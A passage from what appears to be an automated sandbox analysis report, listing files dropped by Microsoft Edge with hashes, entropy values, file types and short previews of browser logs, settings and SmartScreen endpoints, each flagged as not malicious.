                                                                                                                                                                                                                                                                                                  SHA-512:A32B9CAF469222FEEEA94C8C8B17FF7057B1A05222B3A7407A2388F7CC1C2ED7B23545BA25E96BB7D92766243A43F1ADDEBC6388DB5E5D72A6E552E72E983582
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.124187466164022
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XHFMIq2P923oH+TcwtfrK+IFUt8U4XPZmw+U4XFFIkwO923oH+TcwtfrUeLJ:BrIv4Yeb23FUt8Uk/+UiFI5LYeb3J
                                                                                                                                                                                                                                                                                                  MD5:89E1EDEE125D9B3604828A886764EA49
                                                                                                                                                                                                                                                                                                  SHA1:93865EFE23340B1786C357EE846DDA96F559F378
                                                                                                                                                                                                                                                                                                  SHA-256:1E3205B4CB70267940AC53FF284ED03AB8EE07CA46224ACCB33D564A0653AD09
                                                                                                                                                                                                                                                                                                  SHA-512:9F82D41349140D06B66635CE70169E6E4D07F3E9F8B896B697E1EBAF107A4DDAF31BA32A87F39BBF404BCEC10737738A8BFB8ABBE96A53E23065BE2598722AFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.114 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:01:22.115 e04 Recovering log #3.2024/12/27-01:01:22.116 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.124187466164022
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XHFMIq2P923oH+TcwtfrK+IFUt8U4XPZmw+U4XFFIkwO923oH+TcwtfrUeLJ:BrIv4Yeb23FUt8Uk/+UiFI5LYeb3J
                                                                                                                                                                                                                                                                                                  MD5:89E1EDEE125D9B3604828A886764EA49
                                                                                                                                                                                                                                                                                                  SHA1:93865EFE23340B1786C357EE846DDA96F559F378
                                                                                                                                                                                                                                                                                                  SHA-256:1E3205B4CB70267940AC53FF284ED03AB8EE07CA46224ACCB33D564A0653AD09
                                                                                                                                                                                                                                                                                                  SHA-512:9F82D41349140D06B66635CE70169E6E4D07F3E9F8B896B697E1EBAF107A4DDAF31BA32A87F39BBF404BCEC10737738A8BFB8ABBE96A53E23065BE2598722AFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.114 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:01:22.115 e04 Recovering log #3.2024/12/27-01:01:22.116 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):787
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.059252238767438
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
                                                                                                                                                                                                                                                                                                  MD5:D8D8899761F621B63AD5ED6DF46D22FE
                                                                                                                                                                                                                                                                                                  SHA1:23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
                                                                                                                                                                                                                                                                                                  SHA-256:A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
                                                                                                                                                                                                                                                                                                  SHA-512:4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.077232045769241
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4Xyq2P923oH+TcwtfrzAdIFUt8U4X7Zmw+U4XBFkFkwO923oH+TcwtfrzILJ:Bdv4Yeb9FUt8U4/+UmFkF5LYeb2J
                                                                                                                                                                                                                                                                                                  MD5:1769E5E8FF88AB0556BB2727703423B3
                                                                                                                                                                                                                                                                                                  SHA1:751938D8509B64488D3E38D1A14EF9544557ED7B
                                                                                                                                                                                                                                                                                                  SHA-256:B091395A56D6C44BC57DC89409E37B8EE354C4FDBB5B00D73513A85CDE3876D2
                                                                                                                                                                                                                                                                                                  SHA-512:358FDD785C194A276616C7519A5FCC98E3EBDC231609613708DB60B0658AE19F92FAEBB5A50E6CFA70B82C554FA814FC91BFFD5DE427AFE9C4762720D49848F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.111 e04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-01:01:22.111 e04 Recovering log #3.2024/12/27-01:01:22.112 e04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                                                  Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                  MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                  SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                  SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                  SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:uriCache_
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.020952373252143
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQeVlk:YWLSGTt1o9LuLgfGBPAzkVj/T8lQ9
                                                                                                                                                                                                                                                                                                  MD5:A5B95D075BAD3D5F31F7B0740A8AAE1B
                                                                                                                                                                                                                                                                                                  SHA1:CD79B0F09765FFB5E570015CABF9F9A00485A56C
                                                                                                                                                                                                                                                                                                  SHA-256:FB922ED9E01E2C92D99AA69951E28DA97722AEE46DE3DF8DB62A536971845A8C
                                                                                                                                                                                                                                                                                                  SHA-512:6509DD8CF9D476B80C72C868BED2AB1D46B0CF19209D9C056B79E9BCE00CF173B9FD185DF91585AED36214C6395C89DC34EA760198DD1A132DD815B6540540C8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735380086482912}]}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                  MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                  SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                  SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                  SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
